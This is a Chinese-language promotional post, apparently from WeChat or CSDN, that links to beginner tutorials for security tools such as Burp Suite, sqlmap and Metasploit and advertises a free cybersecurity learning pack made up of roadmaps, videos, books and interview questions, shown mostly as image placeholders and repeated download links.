[2024版最新AWVS安装使用教程（非常详细）零基础入门到精通，收藏这一篇就够了](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247502015&idx=1&sn=90f663164ed79573291671c1f5bdcdb3&chksm=ce9c0877f9eb8161bc73070ecfe5f362c89ef099711562a71d4422b222943426a7ea75c66dd1&scene=21#wechat_redirect)

  

[2024版最新burpsuite安装使用教程（非常详细）零基础入门到精通，收藏这一篇就够了](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247502055&idx=1&sn=3d683249b5890090f7880e450165e5e9&chksm=ce9c082ff9eb8139e78493c1388199b601628de8ed301ecb5ce2e83c76fd308f9fe5bcc47e80&scene=21#wechat_redirect)

  

[2024版最新owasp\_zap安装使用教程（非常详细）零基础入门到精通，收藏这一篇就够了](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247502097&idx=1&sn=e054a0a52e9c9e7bdb6edb8da9b14989&chksm=ce9c09d9f9eb80cff6f160afb900df75c132604af895f29b5c0fd2a60ad4349e505ef395c0f5&scene=21#wechat_redirect)

  

[2024版最新Sqlmap安装使用教程（非常详细）零基础入门到精通，收藏这一篇就够了](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247502141&idx=1&sn=5dfa002ea94f50ea1d6627348a932dcc&chksm=ce9c09f5f9eb80e3177e21dc10f0ccaff04f64b464735f29e19c96b0adb39f16ba12aee4f36e&scene=21#wechat_redirect)

  

[2024版最新Metasploit安装使用教程（非常详细）零基础入门到精通，收藏这一篇就够了](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247502162&idx=1&sn=e365341b6504cfe663fb3d18daa26e36&chksm=ce9c099af9eb808c709e6e506fac186d41c52b8cf7e96b7237589be9969453fcf0b3f390e63c&scene=21#wechat_redirect)

  

[2024版最新Nessus下载安装激活使用教程（非常详细）零基础入门到精通，收藏这一篇就够了](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247502183&idx=1&sn=d26fa5ca3a08200e3816d0c5c549fe49&chksm=ce9c09aff9eb80b907d75e9774b7cbf792347a6bec267011137be1bb7ba181be5c0a1bfae6e3&scene=21#wechat_redirect)

  

[2024版最新Wireshark安装使用教程（非常详细）零基础入门到精通，收藏这一篇就够了](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247502339&idx=1&sn=0fba01751f4e6e571f351ca50f36e3f3&chksm=ce9c0acbf9eb83dd11c781db73b18a603cd308a681dacbda5b98ecb534fc51f7aee8419c59fd&scene=21#wechat_redirect)

  

  

  

觉得有用的话，希望粉丝朋友帮大白点个**「分享」**「收藏」******「在看」****「赞」**

  

![](https://img-blog.csdnimg.cn/img_convert/751a0f1b2a24f58a489ae94751c7e1c1.png)

**黑客/网络安全学习包**

![](https://img-blog.csdnimg.cn/img_convert/9bcee19268a6f5a1b46600b955ae2b66.png)

![](https://img-blog.csdnimg.cn/img_convert/eaf0737584cdc3cebce91a9aafe3df90.png)

**资料目录**

1.  成长路线图&学习规划
    
2.  配套视频教程
    
3.  SRC&黑客文籍
    
4.  护网行动资料
    
5.  黑客必读书单
    
6.  面试题合集
    

  
<font color="red">因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

****************************************************************************************************************************************************************************************************************************************************************[优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享](https://mp.weixin.qq.com/s/Z0QpzQFIqasJPfRNUb25dg "优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享")****************************************************************************************************************************************************************************************************************************************************************

  

1.成长路线图&学习规划

要学习一门新的技术，作为新手一定要**先学习成长路线图**，**方向不对，努力白费**。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

![](https://img-blog.csdnimg.cn/img_convert/862a9749f83812b6349e5decc6555350.png)

![](https://img-blog.csdnimg.cn/img_convert/acf39ca0bf5ea24d72639363df33eba4.png)
<font color="red">因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

****************************************************************************************************************************************************************************************************************************************************************[优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享](https://mp.weixin.qq.com/s/Z0QpzQFIqasJPfRNUb25dg "优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享")****************************************************************************************************************************************************************************************************************************************************************

2.视频教程

很多朋友都不喜欢**晦涩的文字**，我也为大家准备了视频教程，其中一共有**21个章节**，每个章节都是**当前板块的精华浓缩**。

![](https://img-blog.csdnimg.cn/img_convert/29673ac6bab93d161010f7245061518b.png)

![](https://img-blog.csdnimg.cn/img_convert/b474b601738145e0a293e1915530de9e.png)
<font color="red">因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

****************************************************************************************************************************************************************************************************************************************************************[优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享](https://mp.weixin.qq.com/s/Z0QpzQFIqasJPfRNUb25dg "优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享")****************************************************************************************************************************************************************************************************************************************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的**SRC技术文籍&黑客技术**也有收录

**SRC技术文籍：**

![](https://img-blog.csdnimg.cn/img_convert/12583c7e827d2fab6b2b224ca59b0abb.png)

  

**黑客资料由于是敏感资源，这里不能直接展示哦！**

  

4.护网行动资料

  

其中关于**HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！**


  

5.黑客必读书单

**

![](https://img-blog.csdnimg.cn/img_convert/33539f7cee70f4110aeab42a95c5c2ed.jpeg)

**

6.面试题合集

  

当你自学到这里，你就要开始**思考找工作**的事情了，而工作绕不开的就是**真题和面试题。**

![](https://img-blog.csdnimg.cn/img_convert/fb966ea191c95fccd236865a64d06a0d.png)

**更多内容为防止和谐，可以扫描获取~**

![](https://img-blog.csdnimg.cn/img_convert/de34bdf226f283392e04fd4f8ac550da.png)

  
<font color="red">因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

****************************************************************************************************************************************************************************************************************************************************************[优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享](https://mp.weixin.qq.com/s/Z0QpzQFIqasJPfRNUb25dg "优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享")****************************************************************************************************************************************************************************************************************************************************************